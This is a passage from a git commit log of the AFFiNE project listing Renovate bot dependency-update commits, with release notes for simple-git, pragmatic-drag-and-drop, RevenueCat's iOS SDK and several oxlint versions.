[#​138](https://redirect.github.com/Brooooooklyn/simple-git/pull/138) - fix: adapt to git2 0.21 string accessor API changes by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn) in [#​140](https://redirect.github.com/Brooooooklyn/simple-git/pull/140) - chore(deps): update actions/cache action to v6 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​139](https://redirect.github.com/Brooooooklyn/simple-git/pull/139) - chore(deps): update actions/checkout action to v7 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​137](https://redirect.github.com/Brooooooklyn/simple-git/pull/137) - feat: file modification metadata (author + bulk) by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn) in [#​141](https://redirect.github.com/Brooooooklyn/simple-git/pull/141) - feat: git feature suite (status, config, push, index/commit, blame, branch/checkout) by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn) in [#​142](https://redirect.github.com/Brooooooklyn/simple-git/pull/142) - chore(deps): lock file maintenance by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​144](https://redirect.github.com/Brooooooklyn/simple-git/pull/144) - feat!: API 1.0 breaking sweep (number bitflags, Date times, async I/O, fixes) by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn) in [#​143](https://redirect.github.com/Brooooooklyn/simple-git/pull/143) **Full Changelog**: <https://github.com/Brooooooklyn/simple-git/compare/v0.1.22...v1.0.0> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e8fefc82c1 |
chore: bump up @atlaskit/pragmatic-drag-and-drop version to v2 (#15394)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@atlaskit/pragmatic-drag-and-drop](https://atlassian.design/components/pragmatic-drag-and-drop/) ([source](https://redirect.github.com/atlassian/pragmatic-drag-and-drop)) | [`^1.7.7` → `^2.0.0`](https://renovatebot.com/diffs/npm/@atlaskit%2fpragmatic-drag-and-drop/1.8.1/2.0.1) |  |  | --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
3824018d2d |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.83.0" (#15393)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.82.0"` → `from: "5.83.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.83.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.82.0...5.83.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.82.0...5.83.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
ea7df7f428 |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.82.0" (#15388)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.76.0"` → `from: "5.82.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.82.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.3...5.82.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.3...5.82.0) ### [`v5.81.3`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.2...5.81.3) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.2...5.81.3) ### [`v5.81.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.1...5.81.2) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.1...5.81.2) ### [`v5.81.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.0...5.81.1) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.81.0...5.81.1) ### [`v5.81.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.3...5.81.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.3...5.81.0) ### [`v5.80.3`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.2...5.80.3) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.2...5.80.3) ### [`v5.80.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.1...5.80.2) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.1...5.80.2) ### [`v5.80.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.0...5.80.1) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.80.0...5.80.1) ### [`v5.80.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.79.0...5.80.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.79.0...5.80.0) ### [`v5.79.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.78.0...5.79.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.78.0...5.79.0) ### [`v5.78.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.77.0...5.78.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.77.0...5.78.0) ### [`v5.77.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.76.0...5.77.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.76.0...5.77.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
d124d6eaca |
chore: bump up oxlint version to v1.76.0 (#15387)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [oxlint](https://oxc.rs/docs/guide/usage/linter) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint)) | [`1.68.0` → `1.76.0`](https://renovatebot.com/diffs/npm/oxlint/1.68.0/1.76.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/oxc (oxlint)</summary> ### [`v1.76.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1760---2026-07-27) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.75.0...oxlint_v1.76.0) ##### 🚀 Features - [`8d31dfa`](https://redirect.github.com/oxc-project/oxc/commit/8d31dfa) linter: Verify eslint/no-restricted-globals config schema ([#​24598](https://redirect.github.com/oxc-project/oxc/issues/24598)) (vigneshwar) - [`7069621`](https://redirect.github.com/oxc-project/oxc/commit/7069621) linter: Verify jest/vitest prefer-lowercase-title config schema ([#​24724](https://redirect.github.com/oxc-project/oxc/issues/24724)) (Bartok) - [`016cf2a`](https://redirect.github.com/oxc-project/oxc/commit/016cf2a) linter/oxc: Add bad-match-all-arg rule ([#​24900](https://redirect.github.com/oxc-project/oxc/issues/24900)) (camc314) - [`cdc941e`](https://redirect.github.com/oxc-project/oxc/commit/cdc941e) linter/n: Implement `exports-style` rule ([#​24087](https://redirect.github.com/oxc-project/oxc/issues/24087)) (Mikhail Baev) - [`1ad6f6c`](https://redirect.github.com/oxc-project/oxc/commit/1ad6f6c) linter/eslint: Implement `id-denylist` rule ([#​24632](https://redirect.github.com/oxc-project/oxc/issues/24632)) (Mikhail Baev) ##### 📚 Documentation - [`3ff2e0e`](https://redirect.github.com/oxc-project/oxc/commit/3ff2e0e) linter: Clarify config extends types ([#​24936](https://redirect.github.com/oxc-project/oxc/issues/24936)) (Boshen) ### [`v1.75.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1750---2026-07-20) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.74.0...oxlint_v1.75.0) ##### 🚀 Features - [`dd18383`](https://redirect.github.com/oxc-project/oxc/commit/dd18383) linter/node: Implement no-top-level-await rule ([#​24634](https://redirect.github.com/oxc-project/oxc/issues/24634)) (Connor Shea) - [`16a65f2`](https://redirect.github.com/oxc-project/oxc/commit/16a65f2) linter/react: Implement function-component-definition rule ([#​24471](https://redirect.github.com/oxc-project/oxc/issues/24471)) (Cole Ellison) - [`7f1f585`](https://redirect.github.com/oxc-project/oxc/commit/7f1f585) linter: Reuse `jest/padding-around-test-blocks` for `vitest/padding-around-test-blocks` ([#​24519](https://redirect.github.com/oxc-project/oxc/issues/24519)) (Mikhail Baev) - [`99978a8`](https://redirect.github.com/oxc-project/oxc/commit/99978a8) linter/import/consistent-type-specifier-style: Support `prefer-top-level-if-only-type-imports` option ([#​24502](https://redirect.github.com/oxc-project/oxc/issues/24502)) (camc314) ##### 🐛 Bug Fixes - [`8694167`](https://redirect.github.com/oxc-project/oxc/commit/8694167) linter/eslint/prefer-destructuring: Handle typed declarations ([#​24616](https://redirect.github.com/oxc-project/oxc/issues/24616)) (camc314) ### [`v1.74.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1740---2026-07-13) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.73.0...oxlint_v1.74.0) ##### 🚀 Features - [`0433a83`](https://redirect.github.com/oxc-project/oxc/commit/0433a83) linter/eslint/no-inner-declarations: Add `namespaces` option ([#​24044](https://redirect.github.com/oxc-project/oxc/issues/24044)) (Boshen) ##### 🐛 Bug Fixes - [`8337835`](https://redirect.github.com/oxc-project/oxc/commit/8337835) linter: Error on `ignorePatterns` that cannot match files aoutside the config directory ([#​24341](https://redirect.github.com/oxc-project/oxc/issues/24341)) (leaysgur) - [`2ce5a33`](https://redirect.github.com/oxc-project/oxc/commit/2ce5a33) linter: Resolve `ignorePatterns` relative to the config dir ([#​24339](https://redirect.github.com/oxc-project/oxc/issues/24339)) (leaysgur) ##### ⚡ Performance - [`7f80cac`](https://redirect.github.com/oxc-project/oxc/commit/7f80cac) linter/vue/prop-name-casing: Precompile `ignoreProps` regex pattern ([#​24413](https://redirect.github.com/oxc-project/oxc/issues/24413)) (connorshea) - [`6272051`](https://redirect.github.com/oxc-project/oxc/commit/6272051) linter/typescript/no-require-imports: Compile allow patterns once ([#​24417](https://redirect.github.com/oxc-project/oxc/issues/24417)) (connorshea) - [`33805b9`](https://redirect.github.com/oxc-project/oxc/commit/33805b9) linter/jsdoc/require-param: Compile checkTypesPattern regex once ([#​24420](https://redirect.github.com/oxc-project/oxc/issues/24420)) (connorshea) ### [`v1.73.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1730---2026-07-06) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.72.0...oxlint_v1.73.0) ##### 🚀 Features - [`a2c97f3`](https://redirect.github.com/oxc-project/oxc/commit/a2c97f3) linter/unicorn: Implement `explicit-timer-delay` rule ([#​23612](https://redirect.github.com/oxc-project/oxc/issues/23612)) (Mikhail Baev) - [`85735cb`](https://redirect.github.com/oxc-project/oxc/commit/85735cb) linter/unicorn: Implement `no-confusing-array-with` rule ([#​23638](https://redirect.github.com/oxc-project/oxc/issues/23638)) (Shekhu☺️) - [`cb4fbb9`](https://redirect.github.com/oxc-project/oxc/commit/cb4fbb9) linter/eslint: Implement no-unreachable-loop rule ([#​23975](https://redirect.github.com/oxc-project/oxc/issues/23975)) (Todor Andonov) - [`dc32112`](https://redirect.github.com/oxc-project/oxc/commit/dc32112) linter/eslint/no-constant-binary-expression: Check relational comparisons ([#​24088](https://redirect.github.com/oxc-project/oxc/issues/24088)) (camc314) - [`d963967`](https://redirect.github.com/oxc-project/oxc/commit/d963967) linter/unicorn/no-array-sort: Add `allowAfterSpread` option ([#​24043](https://redirect.github.com/oxc-project/oxc/issues/24043)) (Boshen) - [`0a75682`](https://redirect.github.com/oxc-project/oxc/commit/0a75682) linter: Add per-rule timings for type-aware linting ([#​22488](https://redirect.github.com/oxc-project/oxc/issues/22488)) (camchenry) - [`743e222`](https://redirect.github.com/oxc-project/oxc/commit/743e222) linter/react: Add `disallowedValues` option for `forbid-dom-props` rule ([#​23970](https://redirect.github.com/oxc-project/oxc/issues/23970)) (Mikhail Baev) ##### 🐛 Bug Fixes - [`bdb51c7`](https://redirect.github.com/oxc-project/oxc/commit/bdb51c7) linter/jest/prefer-ending-with-an-expect: Validate config patterns ([#​24122](https://redirect.github.com/oxc-project/oxc/issues/24122)) (camc314) - [`45d607d`](https://redirect.github.com/oxc-project/oxc/commit/45d607d) linter/react/forbid-component-props: Make allow/disallow lists optional in schema ([#​24024](https://redirect.github.com/oxc-project/oxc/issues/24024)) (Boshen) ### [`v1.72.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1720---2026-06-29) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.71.0...oxlint_v1.72.0) ##### 🚀 Features - [`1c8f50c`](https://redirect.github.com/oxc-project/oxc/commit/1c8f50c) linter: Add schema for `eslint/no-restricted-import` ([#​23642](https://redirect.github.com/oxc-project/oxc/issues/23642)) (Sysix) ##### 🐛 Bug Fixes - [`742be36`](https://redirect.github.com/oxc-project/oxc/commit/742be36) refactor/node/handle-callback-err: Reject invalid regex config ([#​23740](https://redirect.github.com/oxc-project/oxc/issues/23740)) (camc314) ### [`v1.71.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1710---2026-06-22) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.70.0...oxlint_v1.71.0) ##### 🚀 Features - [`0dc2405`](https://redirect.github.com/oxc-project/oxc/commit/0dc2405) linter: Add schema for `eslint/no-restricted-properties` ([#​23619](https://redirect.github.com/oxc-project/oxc/issues/23619)) (Sysix) - [`b638d0e`](https://redirect.github.com/oxc-project/oxc/commit/b638d0e) linter: Add schema for `node/callback-return` ([#​23615](https://redirect.github.com/oxc-project/oxc/issues/23615)) (Sysix) - [`eb8bedc`](https://redirect.github.com/oxc-project/oxc/commit/eb8bedc) linter: Add schema for `import/extensions` ([#​23557](https://redirect.github.com/oxc-project/oxc/issues/23557)) (WaterWhisperer) - [`46f3625`](https://redirect.github.com/oxc-project/oxc/commit/46f3625) linter: Implement node/no-sync rule ([#​23589](https://redirect.github.com/oxc-project/oxc/issues/23589)) (fujitani sora) - [`b01739a`](https://redirect.github.com/oxc-project/oxc/commit/b01739a) linter: Add schema for `unicorn/numeric-separators-style` ([#​23554](https://redirect.github.com/oxc-project/oxc/issues/23554)) (Mikhail Baev) - [`68afd2a`](https://redirect.github.com/oxc-project/oxc/commit/68afd2a) linter/node: Implement `no-mixed-requires` rule ([#​23539](https://redirect.github.com/oxc-project/oxc/issues/23539)) (fujitani sora) - [`a421215`](https://redirect.github.com/oxc-project/oxc/commit/a421215) linter: Add schema for `eslint/prefer-destructuring` ([#​23410](https://redirect.github.com/oxc-project/oxc/issues/23410)) (WaterWhisperer) - [`84438be`](https://redirect.github.com/oxc-project/oxc/commit/84438be) linter/jsdoc: Added missing options to `require-param-description` ([#​23416](https://redirect.github.com/oxc-project/oxc/issues/23416)) (kapobajza) - [`51910df`](https://redirect.github.com/oxc-project/oxc/commit/51910df) linter/jsdoc: Add missing options to `require-param-type` rule ([#​23418](https://redirect.github.com/oxc-project/oxc/issues/23418)) (kapobajza) - [`e90925f`](https://redirect.github.com/oxc-project/oxc/commit/e90925f) linter/unicorn: Implement prefer-number-coercion rule ([#​23497](https://redirect.github.com/oxc-project/oxc/issues/23497)) (Shekhu☺️) - [`dd1c866`](https://redirect.github.com/oxc-project/oxc/commit/dd1c866) linter/vue: Implement no-async-in-computed-properties rule ([#​23493](https://redirect.github.com/oxc-project/oxc/issues/23493)) (bab) - [`b02444e`](https://redirect.github.com/oxc-project/oxc/commit/b02444e) linter: Add schema for `react/jsx-no-script-url` ([#​23475](https://redirect.github.com/oxc-project/oxc/issues/23475)) (WaterWhisperer) - [`a8dce46`](https://redirect.github.com/oxc-project/oxc/commit/a8dce46) linter/unicorn: Implement `max-nested-calls` rule ([#​23461](https://redirect.github.com/oxc-project/oxc/issues/23461)) (arieleli01212) ##### 🐛 Bug Fixes - [`a303c23`](https://redirect.github.com/oxc-project/oxc/commit/a303c23) linter/jsx-a11y: Align `anchor-is-valid` config with upstream ([#​23446](https://redirect.github.com/oxc-project/oxc/issues/23446)) (camc314) ##### 📚 Documentation - [`b50bf4d`](https://redirect.github.com/oxc-project/oxc/commit/b50bf4d) linter: Remove manually written options doc for `eslint/arrow-body-style` ([#​23490](https://redirect.github.com/oxc-project/oxc/issues/23490)) (Mikhail Baev) ### [`v1.70.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1700---2026-06-15) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.69.0...oxlint_v1.70.0) ##### 🚀 Features - [`2e8bda4`](https://redirect.github.com/oxc-project/oxc/commit/2e8bda4) linter/vue: Implement no-dupe-keys rule ([#​23350](https://redirect.github.com/oxc-project/oxc/issues/23350)) (bab) - [`1490a0a`](https://redirect.github.com/oxc-project/oxc/commit/1490a0a) linter/react: Implement react-compiler rule ([#​23202](https://redirect.github.com/oxc-project/oxc/issues/23202)) (Boshen) - [`dd560ae`](https://redirect.github.com/oxc-project/oxc/commit/dd560ae) linter/unicorn: Implement `no-array-fill-with-reference-type` rule ([#​23397](https://redirect.github.com/oxc-project/oxc/issues/23397)) (Mikhail Baev) - [`af36c2f`](https://redirect.github.com/oxc-project/oxc/commit/af36c2f) linter: Add schema for `react/jsx-curly-brace-presence` ([#​23400](https://redirect.github.com/oxc-project/oxc/issues/23400)) (WaterWhisperer) - [`47d34a3`](https://redirect.github.com/oxc-project/oxc/commit/47d34a3) linter: Add schema for `react/jsx-handler-names` ([#​23393](https://redirect.github.com/oxc-project/oxc/issues/23393)) (WaterWhisperer) - [`f4250d0`](https://redirect.github.com/oxc-project/oxc/commit/f4250d0) linter: Add schema for `unicorn/import-style` ([#​23386](https://redirect.github.com/oxc-project/oxc/issues/23386)) (WaterWhisperer) - [`30c74ce`](https://redirect.github.com/oxc-project/oxc/commit/30c74ce) linter: Add schema for `jsx_a11y/no-noninteractive-element-to-interactive-role` ([#​23384](https://redirect.github.com/oxc-project/oxc/issues/23384)) (Sysix) - [`cfbe8dc`](https://redirect.github.com/oxc-project/oxc/commit/cfbe8dc) linter: Add schema for `jsx_a11y/no-interactive-element-to-noninteractive-role` ([#​23382](https://redirect.github.com/oxc-project/oxc/issues/23382)) (WaterWhisperer) - [`d15b7ff`](https://redirect.github.com/oxc-project/oxc/commit/d15b7ff) linter: Add schema for `typescript/no-restricted-types` ([#​23381](https://redirect.github.com/oxc-project/oxc/issues/23381)) (WaterWhisperer) - [`028a811`](https://redirect.github.com/oxc-project/oxc/commit/028a811) linter: Add schema for `jsx-a11y/media-has-caption` ([#​23377](https://redirect.github.com/oxc-project/oxc/issues/23377)) (Sysix) - [`b3b1038`](https://redirect.github.com/oxc-project/oxc/commit/b3b1038) linter: Add schema for `jsx-a11y/label-has-associated-control` ([#​23376](https://redirect.github.com/oxc-project/oxc/issues/23376)) (Sysix) - [`7ada6b2`](https://redirect.github.com/oxc-project/oxc/commit/7ada6b2) linter: Add schema for `jsx_a11y/no-distracting-elements` ([#​23379](https://redirect.github.com/oxc-project/oxc/issues/23379)) (WaterWhisperer) - [`ee3dd49`](https://redirect.github.com/oxc-project/oxc/commit/ee3dd49) linter: Add schema for `jsx-a11y/img-redundant-alt` ([#​23374](https://redirect.github.com/oxc-project/oxc/issues/23374)) (Sysix) - [`df5f8dd`](https://redirect.github.com/oxc-project/oxc/commit/df5f8dd) linter: Add short descriptions to most lint rules. ([#​23365](https://redirect.github.com/oxc-project/oxc/issues/23365)) (Connor Shea) - [`e3fd735`](https://redirect.github.com/oxc-project/oxc/commit/e3fd735) linter: Add schema for `jsx_a11y/alt-text` ([#​23369](https://redirect.github.com/oxc-project/oxc/issues/23369)) (Sysix) - [`0f2fff4`](https://redirect.github.com/oxc-project/oxc/commit/0f2fff4) linter: Add schema for `react/exhaustive-deps` ([#​23372](https://redirect.github.com/oxc-project/oxc/issues/23372)) (Mikhail Baev) - [`e3e4e10`](https://redirect.github.com/oxc-project/oxc/commit/e3e4e10) linter: Add schema for `react_perf/jsx-no-new-object-as-prop` ([#​23368](https://redirect.github.com/oxc-project/oxc/issues/23368)) (Mikhail Baev) - [`9366d44`](https://redirect.github.com/oxc-project/oxc/commit/9366d44) linter: Add schema for `unicorn/prefer-at` ([#​23366](https://redirect.github.com/oxc-project/oxc/issues/23366)) (WaterWhisperer) - [`f57b55d`](https://redirect.github.com/oxc-project/oxc/commit/f57b55d) linter: Add schema for `typescript/array-type` ([#​23355](https://redirect.github.com/oxc-project/oxc/issues/23355)) (Sysix) - [`0dcf912`](https://redirect.github.com/oxc-project/oxc/commit/0dcf912) linter: Add schema for `typescript/ban-ts-comment` ([#​23354](https://redirect.github.com/oxc-project/oxc/issues/23354)) (Sysix) - [`51fa83e`](https://redirect.github.com/oxc-project/oxc/commit/51fa83e) linter: Add schema for `react/no-did-update-set-state` ([#​23357](https://redirect.github.com/oxc-project/oxc/issues/23357)) (Mikhail Baev) - [`59db0bd`](https://redirect.github.com/oxc-project/oxc/commit/59db0bd) linter: Add schema for `consistent-generic-constructors` ([#​23353](https://redirect.github.com/oxc-project/oxc/issues/23353)) (Sysix) - [`c4775c0`](https://redirect.github.com/oxc-project/oxc/commit/c4775c0) linter: Add schema for `typescript/consistent-type-assertions` ([#​23349](https://redirect.github.com/oxc-project/oxc/issues/23349)) (Sysix) - [`6e516f7`](https://redirect.github.com/oxc-project/oxc/commit/6e516f7) linter: Add schema for `typescript/consistent-type-imports` ([#​23348](https://redirect.github.com/oxc-project/oxc/issues/23348)) (Sysix) - [`012134d`](https://redirect.github.com/oxc-project/oxc/commit/012134d) linter: Add schema for `react/jsx-no-target-blank` ([#​23345](https://redirect.github.com/oxc-project/oxc/issues/23345)) (WaterWhisperer) - [`0806aae`](https://redirect.github.com/oxc-project/oxc/commit/0806aae) linter: Add schema for `jsx_a11y/no-noninteractive-tabindex` ([#​23337](https://redirect.github.com/oxc-project/oxc/issues/23337)) (Mikhail Baev) - [`0708b5a`](https://redirect.github.com/oxc-project/oxc/commit/0708b5a) linter: Add schema for `react/jsx-filename-extension` ([#​23315](https://redirect.github.com/oxc-project/oxc/issues/23315)) (Mikhail Baev) - [`150bce1`](https://redirect.github.com/oxc-project/oxc/commit/150bce1) linter: Add schema for `typescript/no-empty-object-type` ([#​23309](https://redirect.github.com/oxc-project/oxc/issues/23309)) (Sysix) - [`f9e36f1`](https://redirect.github.com/oxc-project/oxc/commit/f9e36f1) linter: Add schema for `typescript/no-duplicate-type-constituents` ([#​23308](https://redirect.github.com/oxc-project/oxc/issues/23308)) (Sysix) - [`937accf`](https://redirect.github.com/oxc-project/oxc/commit/937accf) linter: Add schema for `typescript/no-invalid-void-type` ([#​23307](https://redirect.github.com/oxc-project/oxc/issues/23307)) (Sysix) - [`3e042b9`](https://redirect.github.com/oxc-project/oxc/commit/3e042b9) linter: Add schema for `typescript/no-misused-promises` ([#​23306](https://redirect.github.com/oxc-project/oxc/issues/23306)) (Sysix) - [`da212d1`](https://redirect.github.com/oxc-project/oxc/commit/da212d1) linter: Add schema for `typescript/no-unnecessary-condition` ([#​23305](https://redirect.github.com/oxc-project/oxc/issues/23305)) (Sysix) - [`f8f0d38`](https://redirect.github.com/oxc-project/oxc/commit/f8f0d38) linter: Add schema for `typescript/parameter-properties` ([#​23304](https://redirect.github.com/oxc-project/oxc/issues/23304)) (Sysix) - [`2275fc7`](https://redirect.github.com/oxc-project/oxc/commit/2275fc7) linter: Add schema for `typescript/prefer-nullish-coalescing` ([#​23302](https://redirect.github.com/oxc-project/oxc/issues/23302)) (Sysix) - [`d353858`](https://redirect.github.com/oxc-project/oxc/commit/d353858) linter: Add schema for `typescript/prefer-string-starts-ends-with` ([#​23301](https://redirect.github.com/oxc-project/oxc/issues/23301)) (Sysix) - [`03060f5`](https://redirect.github.com/oxc-project/oxc/commit/03060f5) linter: Add schema for `typescript/triple-slash-reference` ([#​23300](https://redirect.github.com/oxc-project/oxc/issues/23300)) (Sysix) - [`6619cee`](https://redirect.github.com/oxc-project/oxc/commit/6619cee) linter: Add schema for `promise/param-names` ([#​23298](https://redirect.github.com/oxc-project/oxc/issues/23298)) (Sysix) - [`8bf108e`](https://redirect.github.com/oxc-project/oxc/commit/8bf108e) linter: Add schema for `promise/catch-or-return` ([#​23297](https://redirect.github.com/oxc-project/oxc/issues/23297)) (Sysix) - [`48158d0`](https://redirect.github.com/oxc-project/oxc/commit/48158d0) linter: Add schema for `vitest/consistent-each-for` ([#​23294](https://redirect.github.com/oxc-project/oxc/issues/23294)) (Sysix) - [`7e74c98`](https://redirect.github.com/oxc-project/oxc/commit/7e74c98) linter: Add schema for `vitest/consistent-test-filename` ([#​23293](https://redirect.github.com/oxc-project/oxc/issues/23293)) (Sysix) - [`ff94d4a`](https://redirect.github.com/oxc-project/oxc/commit/ff94d4a) linter: Add schema for `vitest/consistent-vitest-vi` ([#​23292](https://redirect.github.com/oxc-project/oxc/issues/23292)) (Sysix) - [`2409a10`](https://redirect.github.com/oxc-project/oxc/commit/2409a10) linter: Add schema for `vitest/prefer-import-in-mock` ([#​23291](https://redirect.github.com/oxc-project/oxc/issues/23291)) (Sysix) - [`3d782b7`](https://redirect.github.com/oxc-project/oxc/commit/3d782b7) linter: Add schema for `react/no-unstable-nested-components` ([#​23287](https://redirect.github.com/oxc-project/oxc/issues/23287)) (Mikhail Baev) - [`0a0bc2f`](https://redirect.github.com/oxc-project/oxc/commit/0a0bc2f) linter/jsx-a11y: Add `allowedRedundantRoles` option to `no-redundant-roles` ([#​22820](https://redirect.github.com/oxc-project/oxc/issues/22820)) (bab) - [`80758a5`](https://redirect.github.com/oxc-project/oxc/commit/80758a5) linter/vue: Implement no-side-effects-in-computed-properties rule ([#​23282](https://redirect.github.com/oxc-project/oxc/issues/23282)) (bab) - [`e3869ac`](https://redirect.github.com/oxc-project/oxc/commit/e3869ac) linter: Add schema for `react/no-object-type-as-default-prop` 